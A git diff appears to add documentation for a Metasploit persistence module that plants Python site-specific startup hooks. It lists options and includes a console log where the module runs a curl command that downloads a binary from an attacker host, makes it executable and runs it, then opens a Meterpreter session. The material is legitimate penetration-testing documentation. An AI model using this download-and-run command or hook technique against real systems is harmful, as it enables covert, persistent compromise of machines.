Adds docs

documentation/modules/exploit/multi/persistence/python_site_specific_hook.md

@@ -1,44 +1,67 @@
-The following is the recommended format for module documentation. But feel free to add more content/sections to this.
-One of the general ideas behind these documents is to help someone troubleshoot the module if it were to stop
-functioning in 5+ years, so giving links or specific examples can be VERY helpful.
-
 ## Vulnerable Application
 
-Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
-files, as well as instructions on installing/configuring the environment if it is different than a
-standard install. Much of this will come from the PR, and can be copy/pasted.
+This module leverages Python's startup mechanism, where some files can be automically processed during the initialization of the Python interpreter. One of those files are startup hooks (site-specific, dist-packages). If these files are present in `site-specific` or `dist-packages` directories, any lines beginning with `import` will be executed automatically. This creates a persistence mechanism, if an attacker has established access to target machine with sufficient permissions.
 
 ## Verification Steps
 Example steps in this format (is also in the PR):
 
-1. Install the application
+
 1. Start msfconsole
-1. Do: `use [module path]`
+1. Get a session 
+1. Do: `use multi/persistence/python_site_specific_hook`
+1. Do: `set session #`
 1. Do: `run`
-1. You should get a shell.
 
 ## Options
-List each option and how to use it.
 
-### Option Name
+### PYTHON_HOOK_PATH
 
-Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.
+If user has session to target machine with non-typical Python paths, they can set their own path to Python hooks.
+
+### EXECUTION_TARGET
+
+Python has multiple locations, where it can store startup hooks. This option specifies if the target location should be SYSTEM one - i.e. should affect all users - or USER one, which targets current user.
 
 ## Scenarios
-Specific demo of using the module that might be useful in a real world scenario.
 
-### Version and OS
+### Linux pop-os 6.17.4-76061704-generic
 
 ```
-code or console output
-```
+msf exploit(multi/persistence/python_site_specific_hook) > run verbose=true 
+[*] Command to run on remote host: curl -so ./xtLDGMnHcvHv http://192.168.3.7:8080/EO6WzfXF6CGyqdBiy1rT5w;chmod +x ./xtLDGMnHcvHv;./xtLDGMnHcvHv&
+[*] Exploit running as background job 9.
+[*] Exploit completed, but no session was created.
 
-For example:
+[*] Fetch handler listening on 192.168.3.7:8080
+[*] HTTP server started
+[*] Adding resource /EO6WzfXF6CGyqdBiy1rT5w
+msf exploit(multi/persistence/python_site_specific_hook) > [*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Python is present on the system
+[*] Detected Python version 3.10
+[*] Got path to site-specific hooks /usr/local/lib/python3.10/dist-packages/
+[*] Creating directory /usr/local/lib/python3.10/dist-packages/
+[*] /usr/local/lib/python3.10/dist-packages/ created
+[*] Client 192.168.3.7 requested /EO6WzfXF6CGyqdBiy1rT5w
+[*] Sending payload to 192.168.3.7 (curl/7.81.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 192.168.3.7
+[*] Meterpreter session 4 opened (192.168.3.7:4444 -> 192.168.3.7:34170) at 2025-11-19 07:04:54 +0100
 
-To do this specific thing, here's how you do it:
+msf exploit(multi/persistence/python_site_specific_hook) > sessions 4
+[*] Starting interaction with 4...
+
+meterpreter > sysinfo
+Computer     : 172.16.187.129
+OS           : Pop 22.04 (Linux 6.17.4-76061704-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: ms
 
 ```
-msf > use module_name
-msf auxiliary(module_name) > set POWERLEVEL >9000
-msf auxiliary(module_name) > exploit
+
+### Windows 10.0.15063
+```
+
 ```